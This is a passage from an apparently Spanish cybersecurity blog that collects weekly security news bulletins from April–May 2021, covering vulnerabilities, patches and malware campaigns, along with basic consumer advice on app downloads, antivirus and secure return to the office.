habría formalizado el pago solicitado con el fin de recuperar la normalidad, no habiéndose confirmado nada desde Colonial Pipeline. Más información: https://www.bleepingcomputer.com/news/security/largest-us-pipeline-shuts-down-operations-after-ransomware-attack/ Microsoft corrige tres vulnerabilidades zero-day y cuatro vulnerabilidades críticas Microsoft ha publicado su boletín de seguridad referente al mes de mayo en el que se corrigen 3 vulnerabilidades zero-day, de las que no se tiene evidencias de explotación activa, a pesar de haber sido divulgadas antes de hacerse pública su corrección. CVE-2021-31204: vulnerabilidad de elevación de privilegios en .NET y Visual Studio. CVE-2021-31207: vulnerabilidad de omisión de funciones de seguridad en Microsoft Exchange Server. Este fallo de seguridad fue el que se descubrió en la edición de 2021 del Pwn2Own que tuvo lugar a principios de abril. CVE-2021-31200: vulnerabilidad de ejecución remota de código en el common utilities del kit de herramientas de NNI (Neural Network Intelligence) de Microsoft. Esta actualización engloba un total de 55 vulnerabilidades, 4 de ellas críticas (CVE-2021-31166 en HTTP Protocol Stack, CVE-2021-26419 en Internet Explorer, CVE-2021-28476 en Hyper-V y CVE-2021-31194 en Windows OLE), 50 importantes y por último, una de criticidad moderada. Ninguna de ellas bajo explotación activa. Todos los detalles: https://msrc.microsoft.com/update-guide/ Adobe corrige vulnerabilidad zero-day explotada activamente Adobe ha parcheado múltiples vulnerabilidades que afectan a doce de sus productos: Adobe Experience Manager, InDesign, Illustrator, InCopy, Genuine Service, Acrobat, Magento, Creative Cloud Desktop Application, Media Encoder, After Effects, Medium, y Animate. Estas ascienden a un total de 43 vulnerabilidades, entre las que se encuentra una vulnerabilidad zero-day que afecta a Adobe Acrobat Reader y está catalogada como CVE-2021-28550. Desde Adobe indican que este fallo de seguridad habría sido explotado activamente en ataques limitados contra dispositivos Windows. Cabe indicar que esta vulnerabilidad de tipo use-after-free permite la ejecución remota de código, lo que podría permitir a los atacantes ejecutar comandos, instalar malware o incluso la posibilidad de obtener acceso a dispositivos de las víctimas que utilicen como sistema operativo Windows y hayan abierto un archivo PDF malicioso especialmente diseñado. Adobe advierte a sus clientes que actualicen las versiones vulnerables lo antes posible. Toda la info: https://helpx.adobe.com/security.html FragAttacks: 12 nuevas vulnerabilidades en el estándar Wi-Fi y sus implementaciones Un investigador belga ha descubierto una serie de 12 nuevas vulnerabilidades que afectan a dispositivos Wi-Fi, denominadas colectivamente como FragAttacks. Estas vulnerabilidades podrían ser utilizadas por atacantes dentro del rango Wi-Fi para inyectar frames en una red Wi-Fi protegida, consiguiendo que la víctima use un servidor DNS controlado por el actor amenaza e interceptar así el tráfico. También permitiría, en el caso de un router, sortear el firewall/NAT, permitiendo a los atacantes comunicarse directamente con los dispositivos de la red Wi-Fi, pudiendo resultar en ataques posteriores a servicios vulnerables. Entre los fallos identificados, CVE-2020-24588, CVE-2020-24587 y CVE-2020-24586 se producen por fallos en el diseño del estándar WiFi, afectando a la mayoría de dispositivos; mientras que CVE-2020-26145, CVE-2020-26144, CVE-2020-26140 y CVE-2020-26143 residen en fallos de implementación, permitiendo inyecciones triviales de frames en redes Wi-Fi protegidas. Otras 5 vulnerabilidades menos triviales residen también en fallos de implementación. El investigador ha asegurado que todo producto Wi-Fi se ve afectado por lo menos por una vulnerabilidad, y la mayoría de productos se ven afectados por varias. Para aquellos que no dispongan todavía de parches también se han facilitado una serie de recomendaciones para su mitigación. Para saber más: https://www.fragattacks.com/ FiveHands: ataques de ransomware de doble extorsión dirigidos a organizaciones La Agencia de Ciberseguridad Estadounidense (CISA) ha publicado una alerta acerca de una nueva variante de ransomware denominada FiveHands, que fue identificada en enero de este año. Sus operadores emplean la técnica de doble extorsión, presente ya en numerosas familias de ransomware y en la que los agentes amenaza reclaman un rescate para descifrar los sistemas vulnerados y no filtrar los datos robados de la organización. En sus intrusiones, aprovechan herramientas disponibles públicamente como SoftPerfect Network Scanner for Discovery y el programa de administración remota de Microsoft, PsExec.exe, junto con ServeManager.exe. También es habitual el despliegue del malware SombRAT, capaz de recopilar datos del sistema vulnerado, así como permitir la descarga y ejecución de DLLs en los sistemas afectados a través de una sesión SSL protegida. Asimismo, FiveHands cuenta con capacidades para eliminar las copias de seguridad de los sistemas o/y cualquier fichero de recuperación. FireEye identificaba en abril a los operadores de FiveHands como UNC2447, vinculándolos con la explotación de una vulnerabilidad zero-day en SonicWall VPN (CVE-2021-20016) para la cual existen parches desde febrero. Todos los detalles: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita la página de CyberSecurityPulse.
14 de mayo de 2021
Boletín semanal de ciberseguridad 1-7 de mayo
Apple corrige cuatro vulnerabilidades día cero en WebKit Apple publicó ayer actualizaciones de seguridad para corregir cuatro vulnerabilidades de día cero que podrían estar siendo activamente explotadas, según indica la propia entidad. Estos cuatro fallos residen en Webkit, el motor de renderizado utilizado por el navegador Safari, pero también por diferentes componentes de sus sistemas para mostrar contenido web sin usar un navegador. Pese a que Apple no ha compartido todos los detalles de estas vulnerabilidades, afirman que procesar contenido web malicioso especialmente diseñado permitiría a un atacante ejecutar código arbitrario de forma remota. Se han identificado los fallos como CVE-2021-30663, CVE-2021-30665, CVE-2021-30666 y CVE-2021-30661, todos ellos bajo posible explotación activa. Los productos afectados son iOS, macOS, iPadOS, watchOS y tvOS. Información completa: https://support.apple.com/en-us/HT212336 Múltiples vulnerabilidades críticas en servidores de correo Exim El equipo de investigación de Qualys ha descubierto 21 vulnerabilidades críticas en el servidor de correo electrónico Exim, disponible para la mayoría de sistemas operativos basados en Unix y que se encuentra preinstalado en diversas distribuciones de Linux, como Debian. Según los investigadores, se estima que el 60% de los servidores de internet se ejecutan sobre Exim. Del total de vulnerabilidades descubiertas, diez de ellas podrían ejecutarse de forma remota, y once podrían explotarse localmente en configuraciones por defecto o, al menos, muy frecuentes. Algunas de ellas podrían encadenarse para ejecutar código de forma remota sin necesidad de autenticación y escalar privilegios. La mayoría de estos errores afectarían a todas las versiones de Exim anteriores a las 4.94.2, desde sus inicios en 2004. Más información: https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server TsuNAME: vulnerabilidad que permite ataques contra servidores DNS autoritarios Diversos investigadores han publicado un paper conjunto exponiéndolos detalles de una vulnerabilidad de DNS, como TsuNAME, que podría ser utilizada como vector de amplificación en ataques de denegación de servicio distribuido (DDoS) dirigidos a servidores DNS autoritarios. Esta vulnerabilidad afecta a los servidores DNS de resolución recursiva, permitiendo a los atacantes enviar consultas ininterrumpidas a servidores autoritarios que tienen registros dependientes cíclicos. El efecto de muchos resolutores recursivos vulnerables podría colapsar un servidor autoritario, afectando a infraestructura DNS crítica como Top Level Domains (TLDs), pudiendo llegar a afectar a los servicios específicos de un país. Los investigadores han hecho pública la herramienta CycleHunter para detectar dependencias cíclicas en zonas DNS. Para saber más: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/137006_advisory.pdf Vulnerabilidad en Qualcomm afecta a dispositivos Android Investigadores de Check Point han publicado los resultados del estudio de una nueva vulnerabilidad de desbordamiento de búfer catalogada como CVE-2020-11292, que podría permitir a un agente amenaza el acceso al registro de llamadas y mensajes de texto (SMS) de un dispositivo móvil, desbloquear la SIM y escuchar las conversaciones del usuario. El fallo reside en un chip que contienen algunos dispositivos, conocido como Mobile Station Modem (MSM) creado por la compañía Qualcomm, el cual se encarga de conectar los dispositivos a la red y es administrado por el sistema operativo QuRT. Más concretamente, los investigadores determinan que la vulnerabilidad radica en el protocolo Qualcomm MSM Interface (QMI), el cual, tras recibir paquetes de tipo TLV mal formados, desencadena una corrupción de memoria y permite que un agente amenaza ejecute su propio código. La vulnerabilidad se podría explotar ocultando los paquetes TLV mal formados dentro de las comunicaciones de radio o contenido multimedia enviado por el dispositivo. Desde Check Point se pusieron en contacto con Qualcomm para notificarles el fallo el año pasado, pero todavía no existe un parche dado que dicen que son los propios proveedores de móviles quienes deben tomar medidas. Todos los detalles: https://research.checkpoint.com/2021/security-probe-of-qualcomm-msm/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita la página de CyberSecurityPulse.
7 de mayo de 2021
Boletín semanal de ciberseguridad 24-30 de abril
BadAlloc - Vulnerabilidades críticas en dispositivos IoT y OT de uso industrial Investigadores de seguridad de Microsoft han descubierto 25 vulnerabilidades críticas de ejecución remota de código (RCE), a las que se ha nombrado en conjunto como BadAlloc, que afectan a una amplia gama de dispositivos, desde el IoT del sector consumo y médico hasta los sistemas de tecnología operativa (OT) de control industrial. Un atacante, podría explotar los fallos para eludir los controles de seguridad y ejecutar código malicioso en los dispositivos o provocar un bloqueo en el sistema. Las vulnerabilidades estarían presentes en sistemas operativos en tiempo real (RTOS) ampliamente utilizados en sectores industriales, en kits de desarrollo de software embebido (SDK) e incluso en implementaciones de la biblioteca estándar C (libc). Los hallazgos se han compartido con los proveedores para la actualización de sus sistemas. El listado completo de vulnerabilidades puede consultarse en el sitio web del Departamento de Seguridad Nacional estadounidense. Más info: https://msrc-blog.microsoft.com/2021/04/29/badalloc-memory-allocation-vulnerabilities-could-affect-wide-range-of-iot-and-ot-devices-in-industrial-medical-and-enterprise-networks/ Vulnerabilidad crítica identificada en Homebrew para MacOS y Linux Un investigador de seguridad japonés llamado RyotaK reportó el pasado 18 de abril una vulnerabilidad en el repositorio oficial de Homebrew Cask que podría ser explotada por atacantes para ejecutar código arbitrario en las máquinas de usuarios que tuvieran Homebrew instalado. Homebrew es un sistema de gestión de paquetes de software libre y de código abierto que permite la instalación de software en el sistema operativo macOS de Apple, así como en Linux. Homebrew Cask amplía la funcionalidad para incluir flujos de trabajo de línea de comandos para aplicaciones de macOS basadas en GUI, fuentes, plugins y otro software que no sea de código abierto. El fallo reportado, para el que se publicó una PoC y que fue corregido tan sólo un día después de ser reportado, residía en la forma de gestionar los cambios de código en su repositorio de Github, que podría dar lugar a una solicitud maliciosa que fuera automáticamente revisada y aprobada. Desde Homebrew también se habría eliminado la acción "automerge" de GitHub, así como la GitHub "review-cask-pr" de todos los repositorios vulnerables. Todos los detalles: https://brew.sh/2021/04/21/security-incident-disclosure/ Fallo en macOS permite la distribución del malware Shlayer Apple ha publicado un parche para el sistema operativo macOS Big Sur, donde corrige una vulnerabilidad para la que no han trascendido más detalles por su parte pero que algunos investigadores describen como la peor vulnerabilidad para los sistemas operativos de Apple en años. A pesar de su gravedad, existe un primer paso necesario para su explotación que podría haber limitado de cierta manera el impacto, y es que para poder explotarlo, se debe convencer al usuario de que descargue o ejecute una aplicación que no está en la Apple Store o que no estaría permitida por Apple. Una vez se consigue ese primer acceso, los atacantes consiguen desplegar un malware mal clasificado por el sistema operativo de Apple, gracias a un error lógico en el código de macOS. Este malware puede omitir todas las comprobaciones realizadas por los mecanismos de seguridad de Apple, diseñadas para detener la ejecución de aplicaciones peligrosas no aprobadas. Investigadores de Jamf han denominado a este malware Shlayer, y confirman que se estaría distribuyendo al menos desde enero de este año. El fallo fue reportado a Apple por el investigador de seguridad Cedric Owens a mediados de marzo. Portavoces de Apple han confirmado que la compañía ha abordado el problema en macOS 11.3 y ha actualizado XProtect, su detección de malware, para bloquear el malware utilizando esta técnica. Según medios especializados, la vulnerabilidad estaría siendo explotada para la distribución de un malware contra ordenadores Mac al menos desde enero. Info completa: https://www.forbes.com/sites/thomasbrewster/2021/04/26/update-your-mac-now-the-worst-hack-in-years-hits-apple-computers/?sh=540dd6b85da0 Vulnerabilidad crítica en Citrix ShareFile El equipo de Citrix ha publicado una actualización de seguridad para corregir una vulnerabilidad crítica de control inadecuado de recursos en su software Citrix ShareFile. El fallo (CVE-2021-22891) se encuentra en el controlador de zonas de almacenamiento de Citrix ShareFile y podría permitir a un atacante remoto no autenticado vulnerar dicho controlador. Sin embargo, el agente amenaza debería tener acceso previo a la red del controlador para poder explotar este fallo. Las versiones afectadas por esta vulnerabilidad son las 5.7 anteriores a la 5.7.3, 5.8 anteriores a la 5.8.3, 5.9 anteriores a la 5.9.3, 5.10 anteriores a la 5.10.1 y 5.11 anteriores a la 5.11.18. Desde Citrix recomiendan actualizar lo antes posible el software a una versión que corrija este fallo. Más detalles: https://support.citrix.com/article/CTX310780 Vulnerabilidad de autenticación en BIG-IP APM AD Investigadores de Silverfort han revelado una nueva vulnerabilidad de evasión (CVE-2021-23008 CVSSv3 8.1) en la función de seguridad del Kerberos Key Distribution Center (KDC) que afectaría a BIG-IP Access Policy Manager (APM). Esta vulnerabilidad permite a un atacante eludir la autenticación de Kerberos al Access Policy Manager (APM) de BIG-IP, eludir las políticas de seguridad y, en algunos casos, evitar la autenticación a la consola de administración de BIG-IP. F5 Networks ha lanzado parches para corregir la vulnerabilidad con correcciones introducidas en las versiones 12.1.6, 13.1.4, 14.1.4 y 15.1.3 de BIG-IP APM. Se espera un parche similar para la versión 16.x próximamente. Toda la info: https://support.f5.com/csp/article/K51213246
30 de abril de 2021
4 consejos para reincorporarte a tu puesto de trabajo de forma segura
Ha pasado ya un año desde que muchos abandonamos nuestro puesto de trabajo físico, en la oficina, para acoger al trabajo en remoto. Los cuartos de estar y las habitaciones se convirtieron en nuestros nuevos despachos y salas de reuniones, y el ambiente laboral se tuvo que compaginar con el de casa y nuestras rutinas en él. Pero parece que, poco a poco, vamos viendo la luz y la vuelta a la oficina está cada vez más cerca, aunque no sea como antes, claro. Sabemos que seguir todas las normas sanitarias establecidas desde hace meses es el primer paso para protegernos en nuestra vuelta a la nueva normalidad en la oficina, pero ¿qué ocurre con nuestros sistemas y dispositivos? ¿Sabemos cómo protegerlos? ¿Se acordarán ellos de cómo volver a su anterior puesto de trabajo? Por ello, desde ElevenPaths, además de recordarte que debemos seguir todas las normas sanitarias establecidas, queremos ayudarte a refrescar tu memoria con estos 4 consejos básicos para mantener tu seguridad también en la red. Acude a profesionales ¿Recuerdas tu primer día de trabajo después de las vacaciones de verano? ¿Ese momento donde tu mente sigue de viaje, pero tú ya estás en la oficina y te toca centrarte, aunque tu cabeza no quiera? Pues a tus dispositivos les pasará un poco igual cuando, después de un año tengan que volver a conectarse a las redes de tu oficina. Para ello, acude a los profesionales. Toda empresa cuenta con un equipo técnico especializado que te conectará tus dispositivos con mucho cariño y, sobre todo, sabiendo cómo y dónde hacerlo. Recuerda que hay muchas redes acechando que entre ellas. Confiar en los que saben es una apuesta garantizada para ir seguro y ahorrar tiempo en tu primer día de vuelta al puesto de trabajo. Asegúrate al 100% antes de hacer click en "aceptar" Muchas veces nos pueden las ganas y las pantallas que nos saltan para pasar al siguiente nivel no son las amigas más fiables. Recuerda que, aunque quieras empezar lo más pronto posible, no se debe aceptar condiciones si saber bien qué suponen. Espera, sé precavido, pregunta a los expertos y actúa con conocimiento. Quien tiene una contraseña, tiene un tesoro Sí, sabemos que lo repetimos mucho, pero es verdad. Las contraseñas son las puertas de accesos a tu información más privada. Todo un tesoro informativo del que muchos ciberdelincuentes buscan aprovecharse. Por eso, en la oficina recuerda siempre huir de post-it donde apuntarlas o agendas en papel que puedan estar a la vista de cualquiera. Apuesta mejor por estas dos vías: utilizar un gestor de contraseñas y validar la verificación en dos pasos (2FA). Ponte al día con los cambios Todas las informaciones y notificaciones que has ido recibiendo en estos últimos meses sobre la vuelta a la oficina son ahora una auténtica biblia para ti. Léelas y ponte al día de los cambios, sobre todo en lo que respecta a la ciberseguridad. Estar informado es una de las mejores formas que tenemos para anticipar posibles ataques a nuestros sistemas y vivir una jornada laboral totalmente segura.
21 de abril de 2021
Boletín semanal de ciberseguridad 10-16 de abril
0-days en Chrome y Edge El investigador de seguridad Rajvardhan Agarwal ha descubierto una vulnerabilidad de tipo 0-day en las versiones actuales de Google Chrome y Microsoft Edge, que ha hecho pública a través de su perfil de Twitter y GitHub. Según informa el medio especializado en ciberseguridad The Record, el código del exploit proviene de una vulnerabilidad que se empleó durante el evento de hacking Pwn2Own la semana pasada. Si bien los detalles de dicha vulnerabilidad nunca se publicaron, Agarwal habría descubierto que se encontraba en el motor de JavaScript V8 de Chromium, revisando el código fuente de los parches. Los desarrolladores de Chromium ya habrían corregido el error, sin embargo, esta corrección aún no formaría parte de las actualizaciones oficiales de navegadores como Google Chrome y Microsoft Edge, que continúan siendo vulnerables. Unos días más tarde, el investigador de seguridad conocido en Twitter como @frust93717815 daba a conocer otra nueva vulnerabilidad 0-day en navegadores basados en Chromium, publicando una PoC en su perfil de Github. Esta nueva vulnerabilidad estaría afectando tanto a Chrome como a Edge y, al igual que la publicada a inicios de semana, podría permitir la ejecución remota de código, pudiendo lograr abrir la aplicación de Windows Notepad. Si bien esta vulnerabilidad no es capaz de escapar al entorno securizado de Chromium, y por ende no es dañina per se, un agente amenaza que logre deshabilitar el argumento de “sandbox” de Chrome (ya sea encadenándola con otras vulnerabilidades o confundiendo al usuario), podría conseguir su explotación. Desde Bleeping Computer han verificado que el exploit es funcional en las últimas versiones de Google Chrome (89.0.4389.128, emitida hace apenas unos días) y Microsoft Edge (89.0.774.76). Ambas vulnerabilidades han sido ya corregidas en la versión 90.0.4430.72 de Google Chrome y en la versión 89.0.774.77 de Microsoft Edge. Más info: https://therecord.media/security-researcher-drops-chrome-and-edge-zero-day-on-twitter/ https://twitter.com/frust93717815/status/1382301769577861123 Boletín de seguridad de Microsoft Microsoft ha publicado su boletín mensual de seguridad para este mes de abril en el que ha corregido más de 100 vulnerabilidades. Entre las actualizaciones se encuentran parches para nuevos fallos en las versiones 2013-2019 de Exchange Server (CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, CVE-2021-28483), todas ellas con una criticidad alta y dos de las cuales permitirían a un posible atacante ejecutar código remoto sin necesidad de autenticarse. Con respecto a estas vulnerabilidades, se ha conocido que la Agencia de Seguridad de Infraestructura y Ciberseguridad de Estados Unidos (CISA) ha instado a todas las agencias federales a que instalen las actualizaciones antes del viernes. Por otro lado, también se ha corregido una vulnerabilidad en Desktop Window Manager, con CVE-2021-28310 y criticidad media, que estaría siendo activamente explotada por varios actores amenaza para elevar privilegios en sistemas vulnerables. Finalmente, también conviene mencionar varias vulnerabilidades RCE con afectación para Microsoft Office: CVE-2021-28454, CVE-2021-28451 (Excel), CVE-2021-28453 (Word) y CVE-2021-28449. Otros sistemas parcheados han sido Edge, Azure, ShrePoint, Hyper-V, Team Foundation y Visual Studio. Todos los detalles: https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/ Adobe corrige múltiples vulnerabilidades críticas Adobe ha parcheado diferentes vulnerabilidades que afectan a cuatro de sus productos: Adobe Photoshop, Adobe Digital Editions, Adobe Bridge y RoboHelp. Estas ascienden a un total de diez vulnerabilidades, entre las que se encuentran dos fallos críticos catalogados como CVE-2021-28548 y CVE-2021-28549 que afectan a Adobe Photoshop, un fallo crítico (CVE-2021-21100) en Adobe Digital Editions, seis vulnerabilidades, entre ellas cuatro críticas (CVE-2021-21093, CVE-2021-21092, CVE-2021-21094, CVE-2021-21095) que tienen impacto sobre Adobe Bridge y, por último, un fallo con riesgo alto que estaría afectando a RoboHelp. Adobe advierte a sus clientes que actualicen las versiones vulnerables lo antes posible. Para saber más: https://helpx.adobe.com/security.html Campañas de distribución de IcedID Investigadores de Microsoft han detectado recientemente una campaña de distribución del malware IcedID mediante formularios de contacto legítimos en páginas web. Los atacantes estarían completando de manera automatizada formularios de contacto que son recibidos por las víctimas en forma de correo electrónico que a simple vista parece fiable. El mensaje enviado utiliza técnicas de ingeniería social para forzar a la víctima a acceder a un enlace embebido, al utilizar lenguaje de urgencia y amenazas legales por falsas reclamaciones de derechos de autor de imágenes u otros materiales supuestamente utilizados en su página web. El enlace redirige a un inicio de sesión de Google donde la víctima introduce sus credenciales, iniciándose automáticamente la descarga del archivo malicioso que contiene IcedID. Simultáneamente, también investigadores de Uptycs y el analista Ali Aqeel han detectado la distribución de IcedID mediante documentos maliciosos de Microsoft, principalmente Excel y Word. Cabe recordar que IcedID es un troyano bancario que roba información financiera de las víctimas, y que también es capaza de actuar como puerta de entrada a los sistemas infectados para otros malware; se estima que puede ser uno de los vectores de acceso del ransomware RansomEXX, que recientemente ha incluido entre sus víctimas al Ayuntamiento de Castelló. Toda la info: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/
16 de abril de 2021
Entrevista: hablamos de familia, tecnología y #MujeresHacker con María Zabala
Te traemos una de nuestras entrevistas en las que hablamos con destacados expertos del sector sobre su trayectoria, sobre ciberseguridad en el día a día y, en definitiva, sobre su experiencia y recomendaciones acerca del uso de la tecnología. Sin duda, estas entrevistas son especialmente importantes para crear un futuro más seguro, ¡así que te animamos a compartirlas y seguirnos en nuestro canal de YouTube! Tras el éxito de la primera entrega con Javier Padilla, en la que hablamos de sus libros y de #MujeresHacker, volvemos con una interesante conversación con María Zabala, periodista, consultora en comunicación y fundadora de iWomanish, un blog sobre familia y tecnología. Hablamos sobre la educación en ciberseguridad y el uso responsable de la tecnología, los ciudadanos digitales y el movimiento #MujeresHacker. Descubre más sobre María Zabala y cómo implicarse en la educación digital de nuestros hijos en Mejor Conectados. Entrevista completa Más entrevistas disponibles
15 de abril de 2021
Consejos para descargar apps de forma segura
La llegada de los smartphones o teléfonos inteligentes supuso un cambio de paradigma en la manera de utilizar y consumir contenido a través de los dispositivos móviles. Tanto es así que, desde ese momento, estos pasaron de concebirse únicamente como teléfonos móviles a auténticos ordenadores de bolsillo. Con esta revolución se abrió un nuevo mundo que hoy en día se extiende a otros dispositivos como tablets, televisores e incluso algunos wearables como los relojes inteligentes. Tanto si utilizas Android como iPhone, en este artículo te traemos unos útiles consejos para descargar aplicaciones de forma segura y que puedas aprovecharlas al máximo sin perder de vista tu ciberseguridad. Utiliza fuentes oficiales Cuando vayas a descargar una app, hazlo siempre desde los markets oficiales: Play Store para dispositivos Android y Apple Store para dispositivos Apple. No confíes en aplicaciones que provienen de páginas web o canales desconocidos. Si tienes dudas, accede a la página web oficial de la compañía cuya app vayas a descargar y desde ahí te redirigirán a la página de descarga, ¡que seguro que será Play Store o Apple Store! Lee reseñas de otros usuarios Al igual que cuando vas a reservar un alojamiento o a comprar por internet, leer reseñas y comentarios de otros usuarios puede ayudarte a aclarar dudas sobre si descargar una app o no, a saber cuáles son sus funcionalidades, etc. Por otra parte, consultar en foros especializados es una buena idea si te interesa conocer más detalles sobre sus especificaciones y su funcionamiento. Comprueba los datos y permisos que solicita Antes de comenzar a utilizar una aplicación, es importante que revises su configuración en los ajustes de tu teléfono. De hecho, normalmente puedes acceder a esta configuración directamente desde la página de descarga de Play Store o Apple Store, en el momento en que termina de descargarse. Activa o desactiva los permisos que consideres necesarios y cuando todo esté en orden, es el momento de comenzar a utilizar la app. Mantén el software actualizado Actualiza tus dispositivos con regularidad, ya que, además de aumentar tu protección frente a ciberamenazas como el ransomware, ayudan a mejorar la compatibilidad y funcionamiento de las aplicaciones que descargas. Esperamos que estos consejos te sean de utilidad y te recomendamos que cuentes también con sistemas de seguridad instalados en tu smartphone. Recuerda que los teléfonos inteligentes son ordenadores de bolsillo con los que cada vez realizamos más tareas y actividades en cualquier momento y desde cualquier parte. Si instalas un antivirus en el ordenador, hazlo también en tu móvil. Síguenos en nuestras redes sociales (Twitter, Facebook, LinkedIn, Instagram, YouTube y Twitch) y visita nuestra web para más consejos, productos y herramientas de ciberseguridad.
14 de abril de 2021
Boletín semanal de ciberseguridad 3-9 de abril
Campaña de distribución de malware mediante LinkedIn El equipo de investigadores de eSentire ha publicado detalles sobre el análisis de una nueva campaña de distribución de malware a través de la plataforma LinkedIn. Agentes amenaza estarían enviando archivos comprimidos .zip con el pretexto de ofertas de empleo, nombrando el fichero igual que el supuesto puesto de trabajo con el fin de ganarse la confianza de la víctima. Una vez abierto el archivo adjunto, se inicia la instalación de forma sigilosa del malware More_eggs, caracterizado por utilizar procesos legítimos de Windows para eludir de esta forma las soluciones de seguridad. Este malware funcionaría como dropper, dado que una vez infectado el dispositivo del usuario se genera acceso al sistema para proceder con la descarga de otro tipo de malware o exfiltrar información. Cabe indicar que esta herramienta se vende como Malware as a Servicie (MaaS) por la organización Golden Chickens, la cual, según los investigadores, tiene vínculos con otros actores avanzados como FIN6, Cobalt Group y Evilnum. Campañas de suplantación en la temporada de declaración de impuestos Se han detectado varias campañas de envío de correos electrónicos fraudulentos a nivel global que estaría aprovechando la temporada de declaración de impuestos como señuelo. El objetivo de los agentes amenaza detrás de estas operaciones sería tanto la distribución de malware, mediante ficheros adjuntos en los mensajes, como la recolección de datos a través de páginas de phishing. En una alerta emitida por el INCIBE, se advierte sobre dicha campaña en curso, dirigida contra empleados y/o autónomos en España, en la cual se suplanta a la Agencia Tributaria. Por otro lado, el Servicio de Impuestos Internos de EE.UU, IRS por sus siglas en inglés (Internal Revenue Service), estaría sufriendo un robo de identidad en correos de phishing dirigidos a estudiantes y personal docente, así como distribución de malware desde enlaces de descarga o archivos adjuntos. BazarLoader emplea call centers underground para su distribución Investigadores de Recorded Future alertan de una nueva campaña de los operadores del malware BazarLoader, activa desde enero de 2021, en la que se estaría haciendo uso de call centers underground para engañar a las víctimas y conseguir que descarguen y abran los documentos maliciosos que las infectarán. Aunque no es la primera vez que se observa esta metodología, si es la primera vez que se emplean los call centers por un malware de gran escala como Bazarloader, en una operación que ha sido denominada como BazarCall o BazaCall. Estas campañas comienzan con el envío de correos de spam a las víctimas seleccionadas; los emails enviados, normalmente simulan ser ofertas, pruebas gratuitas o suscripciones a servicios médicos, IT u otros servicios financieros. En estos emails, se indica que pueden llamar a un teléfono para obtener más información sobre la oferta, si llaman, son atendidos por operadores de habla inglesa que les guían para que se descarguen el adjunto, deshabiliten las funciones de seguridad de Office y permitan al documento (habitualmente un Excel o Word) habilitar las macros, a través de las cuales se descarga el malware y se infecta el sistema. Analistas de seguridad han observado estas campañas desplegando también el ransomware Ryuk o el troyano Trickbot.
9 de abril de 2021
¿De verdad necesito un antivirus?
La ciberseguridad es uno de los temas más en boga por su imparable crecimiento y desarrollo, cada vez es más frecuente su presencia en los medios de información, principalmente noticias sobre descubrimiento de vulnerabilidades, ataques y nuevos ransomware. Al final, lo que el usuario medio percibe es que la ciberseguridad es una cuestión destinada a las empresas y grandes organizaciones y que no afectan a su día a día. Pero no es así. La ciberseguridad es cosa de todos ¿Sigues pensando que no te afectan los ciberataques? Aquí van algunos datos: en 2020, el 43 % de los ataques fueron destinados a pymes, las vulnerabilidades en Android e iOS aumentaron un 44% y los ataques a usuarios continúan centrándose en el envío de correos electrónicos con intentos de phishing y/o malware. Por no hablar de los, cada vez más habituales, escándalos de privacidad relacionados con datos, uso incorrecto de cookies y un largo etcétera. La pregunta obligada que debemos hacernos es: ¿cómo puede protegerse un usuario estándar? En este blog hemos hablado en multitud de ocasiones de consejos para un teletrabajo seguro, consejos para asegurar tus datos o mecanismos para estar seguro en el día a día pero, lo que la mayoría de los usuarios piensan es que un antivirus será suficiente para estar libre de ataques. En este artículo explicamos, para qué sirve un antivirus y qué maneras tienes de estar (más) protegido. ¿Qué es un antivirus? Para comenzar, debemos aclarar qué es un antivirus. Muy populares desde hace décadas, parecen la opción número uno (y muchas veces única) para protegerse en Internet por usuarios. Comenzaron siendo de uso exclusivo para PCs pero, con la revolución de los smartphone, desde hace años también están disponibles en dispositivos móviles. Teniendo en cuenta las horas al día que dedicamos a nuestros smartphone, conviene blindar nuestra seguridad ahí más que en PCs. A grandes rasgos, un antivirus se trata de un software que detecta “virus”, es decir, malware presente en dispositivos (como decíamos, normalmente PCs o smartphone). Este malware procede normalmente de archivos maliciosos adjuntos en correos electrónicos descargados por usuarios o al descargar archivos desde páginas fraudulentas. ¿De pago o gratuitos? La diferencia principal entre antivirus de pago o gratuitos es la cantidad de funcionalidades o features que incluyen (control parental, copias de seguridad,…). Normalmente las licencias de pago se renuevan año a año y tienen varias opciones dependiendo del número de dispositivos a proteger. Existen buenas opciones gratuitas, pero, como decimos, generalmente las opciones de pago son más completas. Incluidos en OS (Windows Defender) En la mayoría de los sistemas operativos existe software instalado por defecto destinado a nuestra defensa. En el caso de Windows (el sistema más común), contamos con Microsoft Defender, un sistema implantado en todos los ordenadores que utilicen Windows. Configuración Prácticamente todas las aplicaciones incluyen la opción de configurar ciertos aspectos de la privacidad. Recomendamos realizar esta configuración antes de utilizar cualquier aplicación o programa que nos descarguemos, así como leer detenidamente las condiciones de uso antes de descargarla. Actualiza, actualiza, actualiza Lo más importante para mantener tu sistema invulnerable es actualizar, siempre que sea posible, tanto el sistema operativo en general, como las aplicaciones o programas en particular, así como el propio antivirus. Ojo, los antivirus gratuitos suelen usar los datos para venderlos a terceros: cuando algo es gratis, el producto eres tú. El mejor antivirus eres tú Un gran porcentaje de ataques tienen éxito porque están dirigidos directamente contra los usuarios, imitando comunicaciones verídicas buscando provocar errores. Es la llamada ingeniería social, y estos son nuestros consejos para no caer en la trampa: Sospecha de todos los correos de los que no conozcas el remitente Haz click solamente en páginas que sepas que son 100 % auténticas o escribe la URL a mano en lugar de hacer click en un enlace de un mail Aunque las páginas https garantizan la conexión cliente-servidor como cifrada, el malware puede infiltrarse en estas páginas, por lo que toda prevención es poca
7 de abril de 2021
Ciberseguridad en tiempos de pandemia, ¿cómo ha afectado el confinamiento a nuestra seguridad digital?
